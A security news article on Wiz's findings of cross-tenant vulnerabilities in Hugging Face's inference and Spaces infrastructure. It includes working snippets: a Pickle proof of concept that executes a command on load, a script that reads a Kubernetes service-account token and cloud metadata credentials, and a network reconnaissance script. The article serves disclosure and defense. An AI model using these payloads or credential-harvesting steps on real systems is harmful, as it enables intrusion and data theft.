Two critical security vulnerabilities in the Hugging Face AI platform opened the door to attackers seeking to access and alter customer data and models.
One of the security weaknesses provided attackers with a way to access machine learning (ML) models belonging to other customers on the Hugging Face platform, while the second allowed them to overwrite all images in a shared container registry. Both flaws, discovered by Wiz researchers, had to do with attackers’ ability to take over parts of Hugging Face’s inference infrastructure.
Wiz researchers found weaknesses in three specific components: Hugging Face's Inference API, which lets users browse and interact with models available on the platform; Hugging Face Inference Endpoints, dedicated infrastructure for deploying AI models in production; and Hugging Face Spaces, a hosting service for showcasing AI/ML applications or collaborating on model development.
The problem with Pickle
By examining Hugging Face's infrastructure and ways to weaponize the bugs they discovered, Wiz researchers found that anyone could easily upload an AI/ML model to the platform, including models based on the Pickle format. Pickle is a widely used Python module for serializing Python objects to a file. Although the Python Software Foundation itself has deemed Pickle insecure, it remains popular because of its ease of use and people's familiarity with it.
“It is relatively simple to create a PyTorch (Pickle) model that will execute arbitrary code upon loading,” according to Wiz.
Wiz researchers took advantage of this by uploading a private Pickle-based model to Hugging Face that opened a reverse shell when loaded. They then interacted with it through the Inference API to obtain shell-like functionality, which they used to explore their environment on Hugging Face's infrastructure.
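The mechanism is easy to demonstrate. The following minimal sketch is illustrative and is not Wiz's actual payload; it shows how a Pickle object can be made to run an arbitrary command the moment it is deserialized, with the harmless `id` command standing in for what would be a reverse shell in a real attack:

```python
import os
import pickle

# Illustrative only: why loading untrusted Pickle data is dangerous.
class MaliciousPayload:
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild the object; returning
        # (os.system, ("id",)) makes deserialization execute that command.
        return (os.system, ("id",))

blob = pickle.dumps(MaliciousPayload())

# Anyone who later deserializes this blob runs the embedded command.
pickle.loads(blob)
```

Because a classic Pickle-based PyTorch checkpoint is loaded through the same deserialization machinery (unless restricted with options such as `torch.load`'s `weights_only`), loading an untrusted model file amounts to running untrusted code.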
This exercise quickly showed the researchers that their model was running in a pod in a cluster on Amazon Elastic Kubernetes Service (EKS). From there the researchers were able to exploit common misconfigurations to extract information that allowed them to gain the privileges required to view secrets that could have allowed them to access other tenants on the shared infrastructure.
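The post-exploitation step can be sketched in a few lines. The snippet below is illustrative only and assumes a typical EKS pod with Kubernetes and EC2 defaults; none of the paths or endpoints are specific to Hugging Face, and the underlying misconfigurations have since been remediated:

```python
import urllib.request

# 1. The service account token automatically mounted into most Kubernetes pods.
TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"
with open(TOKEN_PATH) as f:
    sa_token = f.read()

# 2. The EC2 instance metadata service (IMDSv1 shown; IMDSv2 requires a session token).
IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
role_name = urllib.request.urlopen(IMDS, timeout=2).read().decode()
node_creds = urllib.request.urlopen(IMDS + role_name, timeout=2).read().decode()

print("token bytes:", len(sa_token), "| node role:", role_name)
```

If the node's IAM role or the pod's service account is broader than it needs to be, credentials harvested this way can reach resources belonging to other tenants, which is the cross-tenant exposure Wiz describes.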
With Hugging Face Spaces, Wiz discovered that an attacker could execute arbitrary code during the application creation phase that would allow them to examine network connections from their computer. Their analysis highlighted a connection to a shared container registry containing images belonging to other customers that they could have tampered with.
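Wiz has not published its exact Spaces payload, but the reconnaissance it describes boils down to code that runs during the build phase and enumerates the container's network neighbors. A hedged Python sketch, with nothing Hugging Face-specific in it:

```python
import socket
import struct

# Illustrative build-time reconnaissance: list the container's remote TCP peers
# by parsing /proc/net/tcp (present on any Linux container, no extra tools needed).
def remote_peers(path="/proc/net/tcp"):
    with open(path) as f:
        next(f)  # skip the header line
        for line in f:
            fields = line.split()
            rem_ip_hex, rem_port_hex = fields[2].split(":")
            # The address is a little-endian hex dump of the 32-bit IPv4 address.
            ip = socket.inet_ntoa(struct.pack("<I", int(rem_ip_hex, 16)))
            yield f"{ip}:{int(rem_port_hex, 16)}"

for peer in remote_peers():
    print(peer)
```

It was connections surfaced this way that pointed the researchers at the shared container registry holding other customers' images.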
“In the wrong hands, the ability to write to the internal container registry could have significant implications for the integrity of the platform and lead to supply chain attacks on customer spaces,” Wiz said.
Hugging Face said it has fully mitigated the risks Wiz discovered. The company also acknowledged that the issues stem, at least in part, from its decision to continue allowing Pickle files on the Hugging Face platform despite the well-documented security risks associated with them.
“Pickle files have been the focus of most of the research conducted by Wiz and other recent publications by security researchers on Hugging Face,” the company noted. Allowing the use of Pickle on Hugging Face is “a burden on our engineering and security teams, and we have put in significant effort to mitigate the risks while allowing the AI community to use the tools they choose.”
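One widely recommended way to keep Pickle's convenience without its code-execution risk (offered here as an illustration, not as something Hugging Face's statement prescribes) is to distribute weights in the safetensors format, which stores plain tensors and cannot embed executable objects:

```python
import torch
from safetensors.torch import save_file, load_file

# Illustrative example; tensor names and file name are arbitrary.
weights = {"linear.weight": torch.randn(4, 4), "linear.bias": torch.zeros(4)}
save_file(weights, "model.safetensors")

# Loading reconstructs tensors only -- no code runs during deserialization.
restored = load_file("model.safetensors")
print(restored["linear.weight"].shape)
```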
Emerging risks with AI-as-a-Service
Wiz described its findings as indicative of the risks organizations need to be aware of when using shared infrastructure to host, run, and develop new AI models and applications, a model becoming known as “AI-as-a-service.” The company compared the risks and associated mitigations to those organizations encounter in public cloud environments and recommended applying the same mitigations in AI environments as well.
“Organizations should ensure they have visibility and governance of the entire AI stack being used and carefully analyze all risks,” Wiz said in a blog post this week. “This includes analyzing the usage of malicious models, exposure of training data, sensitive data in training, vulnerabilities in AI SDKs, exposure of AI services, and other toxic risk combinations that could be exploited by attackers,” the security vendor said.
Eric Schwake, director of cybersecurity strategy at Salt Security, says there are two main issues with using AI as a service that organizations need to be aware of. “First, threat actors can upload malicious AI models or exploit vulnerabilities in the inference stack to steal data or manipulate results,” he says. “Second, malicious actors can attempt to compromise training data, leading to biased or inaccurate AI results, commonly known as data poisoning.”
Identifying these problems can be difficult, especially given the complexity of AI models, he says. To help manage some of this risk, it is important for organizations to understand how their applications and AI models interact with APIs and to find ways to secure them. Organizations may also want to explore explainable AI (XAI) “to help make AI models more understandable,” Schwake says, which “could help identify and mitigate biases or risks within AI models.”